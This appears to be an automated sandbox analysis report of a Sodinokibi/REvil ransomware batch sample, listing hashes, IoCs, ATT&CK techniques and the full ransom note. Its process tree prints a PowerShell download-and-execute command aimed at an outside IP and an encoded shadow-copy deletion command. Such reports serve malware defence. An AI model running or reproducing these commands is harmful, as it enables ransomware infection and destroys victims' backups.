sodinokibi | a7804db792288327cecffcd3cf6d6addf7ab9d7c56fac80b588aa76e96e0c383

General

Target

6b344dbcf15e9fffe23ce5307af78070.bat
Size

215B
MD5

edcaf035412a5f6b004822eeba9ec0bc
SHA1

5b65ca011d951eaa8266950415eb13dc55766d40
SHA256

a7804db792288327cecffcd3cf6d6addf7ab9d7c56fac80b588aa76e96e0c383
SHA512

10e58b8f554cca5133ebb0c33800a2de7e063712a791832eaa505379a7897375737f20bad7c7ce0e6ecd1e79e2ab2d5728529fa6a3750f050d56509503474c02

Score

10^/10

ransomware persistence sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/6b344dbcf15e9fffe23ce5307af78070

Extracted

Path

C:\42dh2096-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 42dh2096. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/09D8D1069D6958FB 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/09D8D1069D6958FB Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: fJYEpG7UhT6IijwuiPAwSmkATGhw0FnAlN5UpnY3Gb326w/e2JutNs3A22gnymAs i4FINaHLyY3se7lQVdjwSBH+BC9aQbhp77W/GJ2uTDqV3e7BhkLqqjTyl9HJ/79+ dR7oyUWCd9pLcgaukiUKRmBl18DaMsuGsWKjQbYepb2zPaZI5s+RWq4/DFiOwVlc cqsiQAVqMloQXnoIh+FNYnhaBwQXrFD8z4rVOkBqX8QxfqirA87VoToHYOOtb7Se X2YJaYqg4UVebCVPKv65nJANy8PahGdVzDL2d3g5gFEC+ECDDEqfjxecA7SgmcPT RwAo6U6503Kn5NDrR8Ght1/U2RfYCIO5sgkn+r/fd2CKIjS3vJM3e+PkFoDae0JU mN/awWskR7YfMuWRGCHKhm71SW20A4BHsPHzVhYR+QRr0l9ID0EQqmphsQXucGK3 nhm9mWm395qZOi9SMC6Lj4MZx5XywWR0zTvVSHihRidbVBptZFkyygE55+xV22Pm T/gr1MLZmvFtVSLuVNhEO3hvSwSO7/6k/vBzDO7Aqt0Dh/W24kYk/WJhJlspLUsz 3OQuV036EunNbHd4FImyE7XzghFh9LV79/F/ScgQLb+KibwWF6kp9vIPA4FjGBvN hTH77LkXCEsvjC9qkYOl+dQIyc7VZS/ftngQxLQWt6c3EoO46gKkfpTb+KyYv8Ks 0q1MX3yG8oXyFG9DjO/+WCdNAy+j+WzBS9PYAvR1bsipT1NneZukRaKqMs0WTnHx ZBDgA5Q67tsBIb7r3SGkACtenVDSVnXuZeA0b6v3h7/TZ4TECVyf+w0bbOzMc0Gj 5BhT4gC4a+dD/+BPL5Hm8B0MNvUmeAk/mQ9DfvfsO6DkEnHFoi5ZM38KtNjW9dNp uHW6Xmoaf9ho3wuDyriETKW9s+SWApLfk7s37yPV3DBzOoMBKra6Xkp1/s+fYrdW DjCozIKMC+vr/IgWc6U/35WXH4tccrMAG/4VQ0lcvyTy9KV+NBbm6LHRw1aCqh4O ax3mGGRgMvvsLhT4CWceLUfWeH+9J8Hb7d+rWbBId8jcytLHtZH17fqbCOewx0gc 1zgQJCaix31U2AYSm/ynpzFCzaatS1h11BOsEN0XAZDm9mgKNPRmSRQXBN7DAPyJ xfu8D/QPcDVg0ikl35q0MS9QY7Z/ouE+6rZc8Ho3ZsLsCtRVEwMpnd+ppNNdjtzt QVQQFDS4Q9zykrmeb1DDQh+rJjVfCbec2+mbtsHTUIpasqCL8OF+hRYIUuvrevpV o/gn0ufGtdxdMwZO4XyQ6CxSTxo= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/09D8D1069D6958FB

http://decryptor.cc/09D8D1069D6958FB

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

1 3864 powershell.exe

flow	pid	process
1	3864	powershell.exe

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\LimitResolve.tiff => \??\c:\users\admin\pictures\LimitResolve.tiff.42dh2096	powershell.exe
File renamed	C:\Users\Admin\Pictures\UninstallDismount.png => \??\c:\users\admin\pictures\UninstallDismount.png.42dh2096	powershell.exe
File renamed	C:\Users\Admin\Pictures\OpenStep.raw => \??\c:\users\admin\pictures\OpenStep.raw.42dh2096	powershell.exe
File renamed	C:\Users\Admin\Pictures\SaveStart.png => \??\c:\users\admin\pictures\SaveStart.png.42dh2096	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\LimitResolve.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\CheckpointCopy.crw => \??\c:\users\admin\pictures\CheckpointCopy.crw.42dh2096	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\t430q33.bmp"	powershell.exe

Drops file in Program Files directory 24 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\StopUndo.potm	powershell.exe
File opened for modification	\??\c:\program files\ConnectTest.ogg	powershell.exe
File opened for modification	\??\c:\program files\MountStop.easmx	powershell.exe
File opened for modification	\??\c:\program files\ResetUnregister.DVR	powershell.exe
File opened for modification	\??\c:\program files\SaveOut.css	powershell.exe
File opened for modification	\??\c:\program files\UninstallMerge.ini	powershell.exe
File opened for modification	\??\c:\program files\EnterOptimize.m1v	powershell.exe
File opened for modification	\??\c:\program files\InvokeEdit.ttf	powershell.exe
File opened for modification	\??\c:\program files\DebugDisconnect.otf	powershell.exe
File opened for modification	\??\c:\program files\DebugGet.001	powershell.exe
File opened for modification	\??\c:\program files\DebugStart.edrwx	powershell.exe
File opened for modification	\??\c:\program files\InitializeEnable.cfg	powershell.exe
File opened for modification	\??\c:\program files\InstallBlock.wmf	powershell.exe
File opened for modification	\??\c:\program files\ResumeLock.mht	powershell.exe
File created	\??\c:\program files (x86)\42dh2096-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ApprovePublish.m4a	powershell.exe
File opened for modification	\??\c:\program files\MergeBlock.mpv2	powershell.exe
File opened for modification	\??\c:\program files\OutWatch.aifc	powershell.exe
File opened for modification	\??\c:\program files\ResetStep.vsx	powershell.exe
File opened for modification	\??\c:\program files\SearchApprove.mov	powershell.exe
File opened for modification	\??\c:\program files\StopStart.dwfx	powershell.exe
File opened for modification	\??\c:\program files\WriteNew.wvx	powershell.exe
File created	\??\c:\program files\42dh2096-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ApproveConvert.au	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exe

pid	process
3864	powershell.exe
3864	powershell.exe
3864	powershell.exe
3864	powershell.exe
3864	powershell.exe
3004	powershell.exe
3004	powershell.exe
3004	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	3864	powershell.exe
Token: SeDebugPrivilege	3864	powershell.exe
Token: SeDebugPrivilege	3004	powershell.exe
Token: SeBackupPrivilege	4000	vssvc.exe
Token: SeRestorePrivilege	4000	vssvc.exe
Token: SeAuditPrivilege	4000	vssvc.exe
Token: SeTakeOwnershipPrivilege	3864	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 344 wrote to memory of 3864	344	cmd.exe	powershell.exe
PID 344 wrote to memory of 3864	344	cmd.exe	powershell.exe
PID 344 wrote to memory of 3864	344	cmd.exe	powershell.exe
PID 3864 wrote to memory of 3004	3864	powershell.exe	powershell.exe
PID 3864 wrote to memory of 3004	3864	powershell.exe	powershell.exe
PID 3864 wrote to memory of 3004	3864	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\6b344dbcf15e9fffe23ce5307af78070.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6b344dbcf15e9fffe23ce5307af78070');Invoke-LPYNMMII;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:4000

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3004-13-0x0000000000000000-mapping.dmp

Download
memory/3004-27-0x0000000009DC0000-0x0000000009DC1000-memory.dmp

Filesize
4KB

Download
memory/3004-26-0x0000000009530000-0x0000000009531000-memory.dmp

Filesize
4KB

Download
memory/3004-24-0x0000000009800000-0x0000000009801000-memory.dmp

Filesize
4KB

Download
memory/3004-14-0x0000000073790000-0x0000000073E7E000-memory.dmp

Filesize
6.9MB

Download
memory/3864-8-0x0000000007420000-0x0000000007421000-memory.dmp

Filesize
4KB

Download
memory/3864-6-0x0000000007360000-0x0000000007361000-memory.dmp

Filesize
4KB

Download
memory/3864-7-0x0000000007CF0000-0x0000000007CF1000-memory.dmp

Filesize
4KB

Download
memory/3864-0-0x0000000000000000-mapping.dmp

Download
memory/3864-9-0x0000000008040000-0x0000000008041000-memory.dmp

Filesize
4KB

Download
memory/3864-10-0x0000000008350000-0x0000000008351000-memory.dmp

Filesize
4KB

Download
memory/3864-11-0x0000000009A60000-0x0000000009A61000-memory.dmp

Filesize
4KB

Download
memory/3864-12-0x0000000008FE0000-0x0000000008FE1000-memory.dmp

Filesize
4KB

Download
memory/3864-5-0x00000000072F0000-0x00000000072F1000-memory.dmp

Filesize
4KB

Download
memory/3864-4-0x0000000007150000-0x0000000007151000-memory.dmp

Filesize
4KB

Download
memory/3864-3-0x00000000074A0000-0x00000000074A1000-memory.dmp

Filesize
4KB

Download
memory/3864-2-0x00000000047E0000-0x00000000047E1000-memory.dmp

Filesize
4KB

Download
memory/3864-1-0x0000000073790000-0x0000000073E7E000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads